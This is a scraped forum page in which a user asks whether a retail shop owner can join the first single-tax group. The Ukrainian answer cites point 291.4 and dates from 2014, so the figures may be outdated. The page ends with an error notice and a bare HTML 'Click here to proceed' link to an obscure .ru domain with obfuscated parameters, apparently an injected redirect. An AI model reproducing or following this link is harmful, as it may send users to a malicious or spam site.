предприниматель единщик

victoriya
предприниматель единщик

может ли предприниматель, который продает товар в розницув магазине быть единщиком первой группы?

12.29.14 8:25
Ответ: licka
Згідно з  пунктом 291.4 до

Згідно з  пунктом 291.4 до першої групи платників єдиного податку відносяться фізичні особи — підприємці, які не використовують працю найманих осіб, здійснюють виключно роздрібний продаж товарів з торговельних місць на ринках та/або провадять господарську діяльність з надання побутових послуг населенню і обсяг доходу яких протягом календарного року не перевищує 150000 гривень.

 

12.29.14 8:28
предприниматель единщик | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=ImYTq0k1MkrHg9AuhlwCJTJnc7zwKJTHvz%2BpRRKZz4zCcmDbTUr%2FWhtEbdNHXgJa%2FuD3ft9tgxDTArvZaMIZEhrCHX%2F%2Bcyja8z6uzMiC2v6gZarFVeLVnTM4zNjzPW1OOEDVJ6286Y8dusPFTjyxXZhE81OrwD%2FByJIKZK8C7DE%3D&t=nfrm">Click here to proceed</a>. </body>